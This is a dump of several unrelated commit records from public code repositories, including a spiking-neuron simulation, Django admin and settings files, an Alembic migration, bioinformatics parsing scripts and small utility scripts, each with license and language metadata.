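# Izhikevich (2003) spiking-network demo: 80% excitatory neurons (a=0.02, d=8)
# and 20% inhibitory neurons (a=0.1, d=2), driven by random thalamic input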
N = 1000
Ne = N * 0.8
Ni = N - Ne
a = numpy.concatenate((
0.02 * numpy.ones((Ne, 1)),
0.1 * numpy.ones((Ni, 1))
))
b = numpy.concatenate((
0.2 * numpy.ones((Ne, 1)),
0.2 * numpy.ones((Ni, 1))
))
c = numpy.concatenate((
-65 * numpy.ones((Ne, 1)),
-65 * numpy.ones((Ni, 1))
))
d = numpy.concatenate((
8 * numpy.ones((Ne, 1)),
2 * numpy.ones((Ni, 1))
))
S = numpy.concatenate((
0.5 * numpy.random.rand(N, Ne),
-1.0 * numpy.random.rand(N, Ni)), axis=1)
v = -65 * numpy.ones((N, 1))
u = numpy.multiply(b, v)
firings = [[], []]
for t in range(1000):
I = 13 * (numpy.random.rand(N, 1) - 0.5)
fired = numpy.argwhere(v >= 30)[:,0]
if fired.size > 0:
for firing in fired:
firings[0].append(t)
firings[1].append(firing)
v[fired] = c[fired]
u[fired] += d[fired]
I += numpy.sum(S[:, fired], 1).reshape((N, 1))
v = v + (0.04 * numpy.square(v) + 5 * v + 140 - u + I)
u = u + numpy.multiply(a, numpy.multiply(b, v) - u)
plt.scatter(
firings[0],
firings[1],
color="black",
marker=".")
plt.show()
| mit | Python |
|
32c5a681c7dd498204d38d5d1152aa7f67e09069 | Add feedback entries to the Admin panel | 19kestier/taiga-back,gauravjns/taiga-back,Zaneh-/bearded-tribble-back,jeffdwyatt/taiga-back,crr0004/taiga-back,CoolCloud/taiga-back,astagi/taiga-back,frt-arch/taiga-back,joshisa/taiga-back,coopsource/taiga-back,rajiteh/taiga-back,astronaut1712/taiga-back,coopsource/taiga-back,astronaut1712/taiga-back,gauravjns/taiga-back,astagi/taiga-back,WALR/taiga-back,taigaio/taiga-back,dayatz/taiga-back,dycodedev/taiga-back,Rademade/taiga-back,EvgeneOskin/taiga-back,obimod/taiga-back,frt-arch/taiga-back,joshisa/taiga-back,EvgeneOskin/taiga-back,Tigerwhit4/taiga-back,dayatz/taiga-back,gam-phon/taiga-back,rajiteh/taiga-back,CMLL/taiga-back,taigaio/taiga-back,crr0004/taiga-back,gam-phon/taiga-back,forging2012/taiga-back,Rademade/taiga-back,seanchen/taiga-back,Zaneh-/bearded-tribble-back,CMLL/taiga-back,frt-arch/taiga-back,gauravjns/taiga-back,obimod/taiga-back,crr0004/taiga-back,CMLL/taiga-back,obimod/taiga-back,astronaut1712/taiga-back,bdang2012/taiga-back-casting,astagi/taiga-back,CoolCloud/taiga-back,taigaio/taiga-back,bdang2012/taiga-back-casting,astagi/taiga-back,WALR/taiga-back,rajiteh/taiga-back,coopsource/taiga-back,jeffdwyatt/taiga-back,CMLL/taiga-back,rajiteh/taiga-back,astronaut1712/taiga-back,dycodedev/taiga-back,Tigerwhit4/taiga-back,CoolCloud/taiga-back,obimod/taiga-back,crr0004/taiga-back,Rademade/taiga-back,Rademade/taiga-back,Rademade/taiga-back,jeffdwyatt/taiga-back,joshisa/taiga-back,WALR/taiga-back,EvgeneOskin/taiga-back,bdang2012/taiga-back-casting,gam-phon/taiga-back,19kestier/taiga-back,forging2012/taiga-back,Zaneh-/bearded-tribble-back,coopsource/taiga-back,EvgeneOskin/taiga-back,joshisa/taiga-back,19kestier/taiga-back,seanchen/taiga-back,jeffdwyatt/taiga-back,WALR/taiga-back,CoolCloud/taiga-back,bdang2012/taiga-back-casting,forging2012/taiga-back,dycodedev/taiga-back,forging2012/taiga-back,dycodedev/taiga-back,xdevelsistemas/taiga-back-community,Tigerwhit4/taiga-back,dayatz/taiga-back,seanchen/taiga-back,Tigerwhit4/taiga-back,xdevelsistemas/taiga-back-community,gauravjns/taiga-back,gam-phon/taiga-back,seanchen/taiga-back,xdevelsistemas/taiga-back-community | taiga/feedback/admin.py | taiga/feedback/admin.py | # Copyright (C) 2014 Andrey Antukh <[email protected]>
# Copyright (C) 2014 Jesús Espino <[email protected]>
# Copyright (C) 2014 David Barragán <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.contrib import admin
from . import models
class FeedbackEntryAdmin(admin.ModelAdmin):
list_display = ['created_date', 'full_name', 'email' ]
list_display_links = list_display
list_filter = ['created_date',]
date_hierarchy = "created_date"
ordering = ("-created_date", "id")
search_fields = ("full_name", "email", "id")
admin.site.register(models.FeedbackEntry, FeedbackEntryAdmin)
| agpl-3.0 | Python |
|
f68b1a9d5aa2c36f9301588a55bc217a9ed120c1 | Create PowerofThree_001.py | Chasego/cod,cc13ny/algo,Chasego/codi,cc13ny/algo,cc13ny/Allin,Chasego/codi,Chasego/codirit,Chasego/codi,cc13ny/algo,Chasego/codirit,Chasego/codi,cc13ny/Allin,Chasego/codirit,Chasego/cod,Chasego/codirit,Chasego/cod,Chasego/codi,cc13ny/Allin,cc13ny/Allin,cc13ny/algo,Chasego/codirit,Chasego/cod,cc13ny/Allin,Chasego/cod,cc13ny/algo | leetcode/326-Power-of-Three/PowerofThree_001.py | leetcode/326-Power-of-Three/PowerofThree_001.py | class Solution(object):
def isPowerOfThree(self, n):
"""
:type n: int
:rtype: bool
"""
        import math  # math.log is used below
        return n > 0 and 3 ** round(math.log(n, 3)) == n
| mit | Python |
|
6c00711a5440fe958691c8064227565461e0acdf | add tools for laa analysis | sequana/sequana,sequana/sequana,sequana/sequana,sequana/sequana,sequana/sequana | sequana/laa.py | sequana/laa.py | from sequana import BAM
import glob
import pandas as pd
import pylab
class LAA():
def __init__(self, where="bc*"):
self.filenames = glob.glob(where + "/" + "amplicon_*summary.csv")
self.data = [pd.read_csv(this) for this in self.filenames]
def hist_amplicon(self, fontsize=12):
data = [len(x) for x in self.data]
pylab.hist(data, bins=max(data), ec="k")
pylab.ylabel("#", fontsize=fontsize)
pylab.ylabel("Number of amplicons per barcode", fontsize=fontsize)
class LAA_Assembly():
"""
Input is a SAM/BAM from the mapping of amplicon onto a known reference.
Based on the position, we can construct the new reference.
"""
def __init__(self, filename):
self.bam = BAM(filename)
def build_reference(self):
self.bam.reset()
# scan BAM file assuming it is small
aa = [a for a in self.bam]
# retrieve data of interest
data = [(a.pos, {
"name":a.query_name,
"sequence": a.query_sequence,
"cigar": a.cigarstring,
"position": a.pos,
"qstart": a.qstart,
"qend": a.qend}) for a in aa]
# sort by starting position
data.sort(key=lambda x: x[0])
for i, read in enumerate(data):
read = read[1]
if i == 0:
sequence = read["sequence"] # 2 is query_sequence
else:
pr = data[i-1][1] # previous read
L = len(pr["sequence"])
end_position_pr = pr['position'] - pr['qstart'] + L
# overlap between previous read and this one
                overlap = end_position_pr - (read['position'] - read['qstart'])
print(overlap)
print(pr['position'], pr['qstart'], L, end_position_pr)
print(read['position'], read['qstart'])
sequence = sequence + read["sequence"][overlap+1:]
# argmax([sum(a==b for a,b in zip(X[-i:] , Y[:i]))/float(i+1) for i in range(1000)])
return sequence
def save_fasta(self, filename, sequence=None):
if sequence is None:
sequence = self.build_reference()
with open(filename, "w") as fout:
fout.write(">test\n{}".format(sequence))
| bsd-3-clause | Python |
|
bbbe3b7d79d57e350b1203a636b6ea64fe818caa | Update migration chain | edofic/ggrc-core,AleksNeStu/ggrc-core,selahssea/ggrc-core,edofic/ggrc-core,josthkko/ggrc-core,prasannav7/ggrc-core,andrei-karalionak/ggrc-core,AleksNeStu/ggrc-core,prasannav7/ggrc-core,j0gurt/ggrc-core,j0gurt/ggrc-core,josthkko/ggrc-core,kr41/ggrc-core,josthkko/ggrc-core,NejcZupec/ggrc-core,andrei-karalionak/ggrc-core,plamut/ggrc-core,NejcZupec/ggrc-core,NejcZupec/ggrc-core,VinnieJohns/ggrc-core,selahssea/ggrc-core,j0gurt/ggrc-core,andrei-karalionak/ggrc-core,j0gurt/ggrc-core,AleksNeStu/ggrc-core,plamut/ggrc-core,VinnieJohns/ggrc-core,VinnieJohns/ggrc-core,kr41/ggrc-core,kr41/ggrc-core,edofic/ggrc-core,plamut/ggrc-core,plamut/ggrc-core,selahssea/ggrc-core,VinnieJohns/ggrc-core,edofic/ggrc-core,prasannav7/ggrc-core,kr41/ggrc-core,NejcZupec/ggrc-core,selahssea/ggrc-core,andrei-karalionak/ggrc-core,prasannav7/ggrc-core,AleksNeStu/ggrc-core,josthkko/ggrc-core | src/ggrc/migrations/versions/20160421141928_1257140cbce5_delete_responses_table.py | src/ggrc/migrations/versions/20160421141928_1257140cbce5_delete_responses_table.py | # Copyright (C) 2016 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: [email protected]
# Maintained By: [email protected]
"""Delete responses table and any other references to responses
Create Date: 2016-04-21 14:19:28.527745
"""
# disable Invalid constant name pylint warning for mandatory Alembic variables.
# pylint: disable=invalid-name
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = '1257140cbce5'
down_revision = '5599d1769f25'
def upgrade():
"""Upgrade database schema and/or data, creating a new revision."""
op.drop_constraint('meetings_ibfk_3', 'meetings', type_='foreignkey')
op.drop_column('meetings', 'response_id')
op.drop_table('responses')
def downgrade():
"""Downgrade database schema and/or data back to the previous revision."""
op.create_table(
'responses',
sa.Column('title', sa.String(length=250), nullable=False),
sa.Column('request_id', sa.Integer(), nullable=False),
sa.Column(
'response_type',
sa.Enum(u'documentation', u'interview', u'population sample'),
nullable=False),
sa.Column('status', sa.String(length=250), nullable=False),
sa.Column('population_worksheet_id', sa.Integer(), nullable=False),
sa.Column('population_count', sa.Integer(), nullable=False),
sa.Column('sample_worksheet_id', sa.Integer(), nullable=False),
sa.Column('sample_count', sa.Integer(), nullable=False),
sa.Column('sample_evidence_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['request_id'], ['requests.id']),
sa.ForeignKeyConstraint(['population_worksheet_id'], ['documents.id']),
sa.ForeignKeyConstraint(['sample_worksheet_id'], ['documents.id']),
sa.ForeignKeyConstraint(['sample_evidence_id'], ['documents.id']),
sa.Index('population_worksheet_document', 'population_worksheet_id'),
sa.Index('sample_evidence_document', 'sample_evidence_id'),
sa.Index('sample_worksheet_document', 'sample_worksheet_id')
)
op.add_column(
'meetings', sa.Column('response_id', sa.Integer(), nullable=False))
op.create_foreign_key(
'meetings_ibfk_3', 'meetings', 'responses', ['response_id'], ['id'])
| # Copyright (C) 2016 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: [email protected]
# Maintained By: [email protected]
"""Delete responses table and any other references to responses
Create Date: 2016-04-21 14:19:28.527745
"""
# disable Invalid constant name pylint warning for mandatory Alembic variables.
# pylint: disable=invalid-name
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = '1257140cbce5'
down_revision = '33459bd8b70d'
def upgrade():
"""Upgrade database schema and/or data, creating a new revision."""
op.drop_constraint('meetings_ibfk_3', 'meetings', type_='foreignkey')
op.drop_column('meetings', 'response_id')
op.drop_table('responses')
def downgrade():
"""Downgrade database schema and/or data back to the previous revision."""
op.create_table(
'responses',
sa.Column('title', sa.String(length=250), nullable=False),
sa.Column('request_id', sa.Integer(), nullable=False),
sa.Column(
'response_type',
sa.Enum(u'documentation', u'interview', u'population sample'),
nullable=False),
sa.Column('status', sa.String(length=250), nullable=False),
sa.Column('population_worksheet_id', sa.Integer(), nullable=False),
sa.Column('population_count', sa.Integer(), nullable=False),
sa.Column('sample_worksheet_id', sa.Integer(), nullable=False),
sa.Column('sample_count', sa.Integer(), nullable=False),
sa.Column('sample_evidence_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['request_id'], ['requests.id']),
sa.ForeignKeyConstraint(['population_worksheet_id'], ['documents.id']),
sa.ForeignKeyConstraint(['sample_worksheet_id'], ['documents.id']),
sa.ForeignKeyConstraint(['sample_evidence_id'], ['documents.id']),
sa.Index('population_worksheet_document', 'population_worksheet_id'),
sa.Index('sample_evidence_document', 'sample_evidence_id'),
sa.Index('sample_worksheet_document', 'sample_worksheet_id')
)
op.add_column(
'meetings', sa.Column('response_id', sa.Integer(), nullable=False))
op.create_foreign_key(
'meetings_ibfk_3', 'meetings', 'responses', ['response_id'], ['id'])
| apache-2.0 | Python |
1d3327d8d804a6e53c020e69b77efbea2086379b | Add staging settings file | ministryofjustice/manchester_traffic_offences_pleas,ministryofjustice/manchester_traffic_offences_pleas,ministryofjustice/manchester_traffic_offences_pleas,ministryofjustice/manchester_traffic_offences_pleas | manchester_traffic_offences/settings/staging.py | manchester_traffic_offences/settings/staging.py | from .base import *
import os
DEBUG = False
TEMPLATE_DEBUG = DEBUG
INSTALLED_APPS += ('raven.contrib.django.raven_compat', )
RAVEN_CONFIG = {
'dsn': os.environ['RAVEN_DSN'],
}
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': os.environ['POSTGRES_DB'],
'USER': os.environ['POSTGRES_USER'],
'PASSWORD': os.environ.get('POSTGRES_PASS', ''),
'HOST': os.environ.get('POSTGRES_HOST', ''),
'PORT': os.environ.get('POSTGRES_PORT', ''),
}
}
ADMINS = (
('Ian George', '[email protected]'),
('Lyndon Garvey', '[email protected]')
)
MANAGERS = ADMINS
ALLOWED_HOSTS = ["staging.makeaplea.justice.gov.uk", ]
SESSION_COOKIE_SECURE = True
# Emails
SMTP_ROUTES["GSI"]["HOST"] = os.environ.get('GSI_EMAIL_HOST', '')
SMTP_ROUTES["GSI"]["PORT"] = int(os.environ.get('GSI_EMAIL_PORT', '25'))
EMAIL_HOST = os.environ.get('EMAIL_HOST', 'email-smtp.eu-west-1.amazonaws.com')
EMAIL_PORT = int(os.environ.get('EMAIL_PORT', '587'))
EMAIL_HOST_USER = os.environ['EMAIL_HOST_USERNAME']
EMAIL_HOST_PASSWORD = os.environ['EMAIL_HOST_PASSWORD']
EMAIL_USE_TLS = True
PLEA_EMAIL_FROM = os.environ['PLEA_EMAIL_FROM']
PLEA_EMAIL_TO = [os.environ['PLEA_EMAIL_TO'], ]
PLP_EMAIL_TO = [os.environ["PLP_EMAIL_TO"], ]
FEEDBACK_EMAIL_TO = [os.environ["FEEDBACK_EMAIL_TO"], ]
FEEDBACK_EMAIL_FROM = os.environ["FEEDBACK_EMAIL_FROM"]
| mit | Python |
|
0d2520001a0666114f9a977f6a5dc2d3ed640464 | Create parse.py | tare/Lux | BS-seq_oxBS-seq_fixed_parameters/parse.py | BS-seq_oxBS-seq_fixed_parameters/parse.py | #!/usr/bin/env python
import sys
import os
import numpy
import scipy.stats
import scipy.special
import argparse
def generate_output_files(data_file,prior_file,bsEff,bsBEff,oxEff,seqErr,prefix):
# prior for g
g_a, g_b = 2, 2/6.0
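    # shape/rate parametrisation; the sampling below draws with scale = 1.0 / g_b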
# read the input files
data = numpy.loadtxt(data_file,delimiter='\t',skiprows=0,dtype='int')
prior = numpy.loadtxt(prior_file,delimiter='\t',skiprows=0,dtype='float')
# make sure that the arrays are 2-dimensional
if len(data.shape) == 1:
data = numpy.reshape(data,[1,len(data)])
if len(prior.shape) == 1:
prior = numpy.reshape(prior,[1,len(prior)])
# check that the files were in the right format
if data.shape[1] % 4 != 0:
sys.exit('error: the number of columns in %s is not divisible by four',data_file)
if prior.shape[1] != 3:
sys.exit('error: there should be exactly three columns in %s',prior_file)
# get the number of replicates
R = data.shape[1]/4
# get the number of noncontrol cytosines
N = data.shape[0]
if len(bsEff) != R or len(bsBEff) != R or len(oxEff) != R or len(seqErr) != R:
sys.exit('error: supply experimental parameters for each replicate')
# get the number of C and total read-outs for noncontrol cytosines in BS-seq and oxBS-seq
bsC, bsTot, oxC, oxTot = data[:,0::4], data[:,1::4], data[:,2::4], data[:,3::4]
bsEff = ','.join(map(str,bsEff))
oxEff = ','.join(map(str,oxEff))
bsBEff = ','.join(map(str,bsBEff))
seqErr = ','.join(map(str,seqErr))
# print DATA
with open(prefix+'_data.R','w') as f:
f.write("bsEff <- c(%s)\noxEff <- c(%s)\nbsBEff <- c(%s)\nseqErr <- c(%s)\ng_a <- %f\ng_b <- %f\n" % (bsEff,oxEff,bsBEff,seqErr,g_a,g_b))
f.write("N <- %d\nR <- %d\n" % (N,R))
f.write("bsC <- structure(c(%s), .Dim=c(%d,%d))\n" % (','.join(map(str,bsC.flatten(1))),N,R))
f.write("bsTot <- structure(c(%s), .Dim=c(%d,%d))\n" % (','.join(map(str,bsTot.flatten(1))),N,R))
f.write("oxC <- structure(c(%s), .Dim=c(%d,%d))\n" % (','.join(map(str,oxC.flatten(1))),N,R))
f.write("oxTot <- structure(c(%s), .Dim=c(%d,%d))\n" % (','.join(map(str,oxTot.flatten(1))),N,R))
f.write("alpha <- structure(c(%s), .Dim=c(%d,%d))\n" % (','.join(map(str,prior.flatten(1))),N,3))
# sample initial values from priors
g = [numpy.random.gamma(g_a,1.0/g_b) for x in range(0,N)]
theta = ','.join(numpy.array([map(str,numpy.random.dirichlet(row)) for row in numpy.tile(prior,(R,1))]).flatten(1))
mu = ','.join(numpy.array([map(str,numpy.random.dirichlet(row)) for row in prior]).flatten(1))
# print INIT
with open(prefix+'_init.R','w') as f:
f.write("g <- c(%s)\n" % (','.join(map(str,g))))
f.write("theta <- structure(c(%s), .Dim=c(%d,%d,3))\n" % (theta,N,R))
f.write("mu <- structure(c(%s), .Dim=c(%d,3))\n" % (mu,N))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Generates data and init files in the dump format for Lux')
parser.add_argument('-d','--data',action='store',dest='data',type=str,required=True,help='noncontrol cytosine data')
parser.add_argument('-p','--prior',action='store',dest='prior',type=str,required=True,help='prior of the noncontrol cytosines')
parser.add_argument('-b','--bseff',action='store',dest='bseff',type=float,nargs='+',required=True,help='bisulfite conversion efficiencies for each replicate')
parser.add_argument('-i','--bsbeff',action='store',dest='bsbeff',type=float,nargs='+',required=True,help='inaccurate bisulfite conversion efficiencies for each replicate')
parser.add_argument('-o','--oxeff',action='store',dest='oxeff',type=float,nargs='+',required=True,help='oxidation efficiencies for each replicate')
    parser.add_argument('-s','--seqerr',action='store',dest='seqerr',type=float,nargs='+',required=True,help='sequencing errors for each replicate')
parser.add_argument('-pr','--prefix',action='store',dest='prefix',type=str,required=True,help='prefix of the output files')
parser.add_argument('-v','--version',action='version',version='%(prog)s 0.666')
options = parser.parse_args()
if not os.path.isfile(options.data):
sys.exit('error: %s is not a file'%(options.data))
if not os.path.isfile(options.prior):
sys.exit('error: %s is not a file'%(options.prior))
generate_output_files(options.data,options.prior,options.bseff,options.bsbeff,options.oxeff,options.seqerr,options.prefix)
| mit | Python |
|
a79a463624ab8bf62fe54d2392d4768c5a38626a | Add migration for removing challenge from Participant. (#203) | taranjeet/EvalAI,taranjeet/EvalAI,taranjeet/EvalAI,taranjeet/EvalAI | apps/participants/migrations/0003_remove_participant_challenge.py | apps/participants/migrations/0003_remove_participant_challenge.py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-12-02 14:45
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('participants', '0002_participantteam_participantteammember'),
]
operations = [
migrations.RemoveField(
model_name='participant',
name='challenge',
),
]
| bsd-3-clause | Python |
|
d78b6c8d0efa3c4b29f254b7465e5e6fcb889395 | Initialize P1_multiplicationTable | JoseALermaIII/python-tutorials,JoseALermaIII/python-tutorials | books/AutomateTheBoringStuffWithPython/Chapter12/PracticeProjects/P1_multiplicationTable.py | books/AutomateTheBoringStuffWithPython/Chapter12/PracticeProjects/P1_multiplicationTable.py | # Create a program multiplicationTable.py that takes a number N from the
# command line and creates an N×N multiplication table in an Excel spreadsheet.
# Row 1 and column A should be used for labels and should be in bold.
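
# A possible solution sketch (not part of the original exercise file), assuming
# the openpyxl package; the function and output file names are illustrative.
import sys

import openpyxl
from openpyxl.styles import Font

def make_table(n, path='multiplicationTable.xlsx'):
    wb = openpyxl.Workbook()
    sheet = wb.active
    bold = Font(bold=True)
    for i in range(1, n + 1):
        sheet.cell(row=1, column=i + 1, value=i).font = bold   # labels in row 1
        sheet.cell(row=i + 1, column=1, value=i).font = bold   # labels in column A
        for j in range(1, n + 1):
            sheet.cell(row=i + 1, column=j + 1, value=i * j)
    wb.save(path)

if __name__ == '__main__':
    make_table(int(sys.argv[1]))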
| mit | Python |
|
58cfcfbde61859a98b317f0498f35f7b7921e41b | Add dummy FileBrowseField | sephii/mezzanine-grappelli,sephii/mezzanine-grappelli | mezzanine_grappelli/filebrowser/fields.py | mezzanine_grappelli/filebrowser/fields.py | from filebrowser.fields import FileBrowseField as BaseFileBrowseField
class FileBrowseField(BaseFileBrowseField):
pass
| bsd-2-clause | Python |
|
775104979a8ee5be040ac830133e69ca848d1ce1 | add snpPriority.py, LD score and effect size weighted SNP scoring | MikeDMorgan/gwas_pipeline,MikeDMorgan/gwas_pipeline,MikeDMorgan/gwas_pipeline,MikeDMorgan/gwas_pipeline,MikeDMorgan/gwas_pipeline | snpPriority.py | snpPriority.py | '''
snpPriority.py - score SNPs based on their LD score and SE weighted effect sizes
===============================================================================
:Author: Mike Morgan
:Release: $Id$
:Date: |today|
:Tags: Python
Purpose
-------
.. Score SNPs based on their LD score and SE weighted effect sizes from
association analysis.
Usage
-----
.. Example use case
Example::
python snpPriority.py
Type::
python snpPriority.py --help
for command line help.
Command line options
--------------------
'''
import sys
import CGAT.Experiment as E
import PipelineGWAS as gwas
import re
import pandas as pd
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option("--database", dest="database", type="string",
help="SQL database containing LD information "
"in table format. Expects columns SNP_A, "
"SNP_B, R2, BP_A and BP_B (Plink --r2 output)")
parser.add_option("--table-name", dest="table", type="string",
help="name of the SQL table containing the LD"
"values")
parser.add_option("--chromosome", dest="chromosome", type="string",
help="chromosome to subset the association results "
"file on")
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
infile = argv[-1]
peek = pd.read_table(infile, nrows=5, sep=None, header=0)
    # len() of a boolean Series is just the row count; .any() actually tests
    # whether any rows besides the additive ("ADD") test are present
    if (peek["TEST"] != "ADD").any():
        clean = False
    else:
        clean = True
snpscores = gwas.snpPriorityScore(gwas_results=infile,
database=options.database,
table_name=options.table,
chromosome=options.chromosome,
clean=clean)
snpscores.to_csv(options.stdout, index_label="SNP",
sep="\t")
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
| mit | Python |
|
80d579bd9376d955eab4a431fb3bcb493518582a | Create __init__.py | vickydasta/grammarripper | kernel/__init__.py | kernel/__init__.py | cc0-1.0 | Python |
||
6deb5c1f2f614e6e6cb420c56c250a27fa032c8b | Add undelete script | scitran/core,scitran/core,scitran/api,scitran/api,scitran/core,scitran/core | bin/undelete.py | bin/undelete.py | #!/usr/bin/env python
"""
Remove the `deleted` tag from containers (recursively) or from individual files.
"""
import argparse
import logging
import sys
import bson
from api import config
from api.dao.containerutil import propagate_changes
log = logging.getLogger('scitran.undelete')
def main():
cont_names = ['projects', 'sessions', 'acquisitions', 'analyses']
cont_names_str = '|'.join(cont_names)
ap = argparse.ArgumentParser(description=sys.modules[__name__].__doc__)
ap.add_argument('cont_name', help='container name to undelete {}'.format(cont_names_str))
ap.add_argument('cont_id', help='container id to undelete (bson.ObjectId)')
ap.add_argument('filename', nargs='?', help='filename within container (string, optional)')
args = ap.parse_args(sys.argv[1:] or ['--help'])
if args.cont_name not in cont_names:
raise ValueError('Invalid cont_name "{}" (must be one of {})'.format(args.cont_name, cont_names_str))
if not bson.ObjectId.is_valid(args.cont_id):
raise ValueError('Invalid cont_id "{}"'.format(args.cont_id))
args.cont_id = bson.ObjectId(args.cont_id)
query = {'_id': args.cont_id}
collection = config.db[args.cont_name]
container = collection.find_one(query)
if container is None:
raise RuntimeError('Cannot find {}/{}'.format(args.cont_name, args.cont_id))
update = {'$unset': {'deleted': True}}
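    # unsetting the "deleted" key is what restores a container or file here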
if args.filename is None:
log.info('Removing "deleted" tag from {}/{}...'.format(args.cont_name, args.cont_id))
collection.update_one(query, update)
log.info('Removing "deleted" tag from child containers recursively...')
propagate_changes(args.cont_name, args.cont_id, None, update, include_refs=True)
else:
log.info('Removing "deleted" tag from file {}/{}/{}...'.format(args.cont_name, args.cont_id, args.filename))
for f in container.get('files', []):
if f['name'] == args.filename:
del f['deleted']
break
else:
raise RuntimeError('Cannot find {}/{}/{}'.format(args.cont_name, args.cont_id, args.filename))
collection.update_one(query, {'$set': {'files': container['files']}})
log.info('Done.')
if __name__ == '__main__':
try:
main()
except (ValueError, RuntimeError) as exc:
log.error(exc.message)
sys.exit(1)
| mit | Python |
|
d0cb340a874cc0430c8b77a0af052d8f2fd4d8c3 | test script to cache Genewiki content | SuLab/scheduled-bots,SuLab/scheduled-bots,SuLab/scheduled-bots | scheduled_bots/cache/genes/getWDHumanGenes.py | scheduled_bots/cache/genes/getWDHumanGenes.py | from wikidataintegrator import wdi_core
import pandas as pd
from rdflib import Graph
import time
import sys
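# SPARQL: every item that is an instance of (P31) gene (Q7187) and is
# found in taxon (P703) Homo sapiens (Q15978631)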
query = """
SELECT * WHERE {
?item wdt:P31 wd:Q7187 ;
wdt:P703 wd:Q15978631 .
}
"""
kg = Graph()
results = wdi_core.WDItemEngine.execute_sparql_query(query)
i =0
for qid in results["results"]["bindings"]:
try:
# print(qid["item"]["value"].replace("http://www.wikidata.org/entity/", ""))
kg.parse(qid["item"]["value"]+".ttl")
i+=1
print(i)
except:
        print(qid["item"]["value"].replace("http://www.wikidata.org/entity/", ""))
time.sleep(5)
kg.serialize(destination="diseases.ttl", format="turtle") | mit | Python |
|
4f2df78c7d8a9621340ff4ee5cfc6f22548d26d5 | add TracedThread that continues the context propagation | palazzem/ot-examples | proposal/helpers.py | proposal/helpers.py | """Helpers that are used in examples. In the current state, we may not require
to put these classes and functions as part of the main proposal.
"""
from threading import Thread
from proposal import tracer
class TracedThread(Thread):
"""Helper class OpenTracing-aware, that continues the propagation of
the current ActiveSpan in a new thread using an internal wrapper.
"""
def __init__(self, *args, **kwargs):
# implementation detail
# get the ActiveSpan when we're in the "parent" thread
self._active_span = tracer.active_span_source.active_span()
super(TracedThread, self).__init__(*args, **kwargs)
def run(self):
# implementation detail
# set the ActiveSpan in this thread and remove the local reference
tracer.active_span_source.make_active(self._active_span)
del self._active_span
super(TracedThread, self).run()
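
# TracedThread is constructed exactly like threading.Thread; the span active in
# the creating thread is captured in __init__ and re-activated inside run(), so
# the trace context follows the work into the new thread.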
| mit | Python |
|
8f1beddb8e3d1a63df10fcde9d3faae0d8d11171 | Add kodi_automation.py | HawkMachine/kodi_automation,HawkMachine/kodi_automation,HawkMachine/kodi_automation | kodi_automation.py | kodi_automation.py |
import sys
import argparse
def Classification(paths):
return ([], [])
def MoveMoveFile(path, movies_dir, dry_run=False):
if dry_run:
sys.stderr.write('Moving movie', path)
return
def MoveEpisodeFile(path, seria, season, episode, series_dir, dry_run=False):
if dry_run:
sys.stderr.write('Moving episode', *args)
return
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--scan-dir', '-s', dest='scan_dir', default=None)
parser.add_argument('--movies-dir', dest='movies_dir', default=None)
parser.add_argument('--series-dir', dest='series_dir', default=None)
parser.add_argument('--video-exts', '-v', dest='video_exts',
default='mkv,avi,mp4')
parser.add_argument('--dry-run', dest='dry_run', default=False)
args = parser.parse_args()
video_exts = args.video_exts.split(',')
new_paths = ScanDir(args.scan_dir)
new_paths = [path for path in new_paths if any(path.endswith(ext) for ext in video_exts)]
movies_paths, episodes = Clasification(new_paths)
for movie_path in movies_paths:
print 'Moving', path, 'to', args.movies_dir
MoveMoveFile(movie_path, args.movies_dir, dry_run=args.dry_run)
for episode in episodes:
print 'Moving', episode.path, 'as', episode.seria, 'S', episode.season, 'E', episode.episode, 'to', args.series_dir
MoveEpisodeFile(
episode.path, episode.seria, episode.season, episode.episode,
args.series_dir, dry_run=args.dry_run)
if __name__ == '__main__':
main()
| mit | Python |
|
d1ca3e7363b835aeca7be2fa00cd7083d9fc8c08 | Create divide_by_year.py | hellrich/JeSemE,hellrich/JeSemE,hellrich/JeSemE,hellrich/JeSemE,hellrich/JeSemE | pipeline/preprocessing/google/divide_by_year.py | pipeline/preprocessing/google/divide_by_year.py | import glob
import gzip
import codecs
import re
import sys
import os
with_pos = False
targets = {}
my_buffer = {}
def flush(a_buffer, some_targets, a_year):
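    # write the buffered lines for one year to that year's output file, then
    # empty the buffer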
for line in a_buffer[a_year]:
some_targets[a_year].write(line)
a_buffer[a_year].clear()
if len(sys.argv) != 3:
raise Exception("Provide 2 arguments:\n\t1,Source directory with raw corpus\n\t2,Target directory for transformed corpus")
directory = sys.argv[1]
target = sys.argv[2]
if not os.path.exists(target):
os.makedirs(target)
for gziped in glob.glob(os.path.join(directory, "googlebooks-*-5gram-20120701-*.gz")):
print("Processing "+gziped)
with gzip.open(gziped, 'rb') as unpacked:
reader = codecs.getreader("utf-8")
for line in reader(unpacked):
text, year, match_count, volume_count = line.split("\t")
has_pos = "_" in text
if (with_pos and has_pos) or (not with_pos and not has_pos):
if year not in targets:
targets[year] = open(os.path.join(target,year),"w",encoding="utf-8")
my_buffer[year] = []
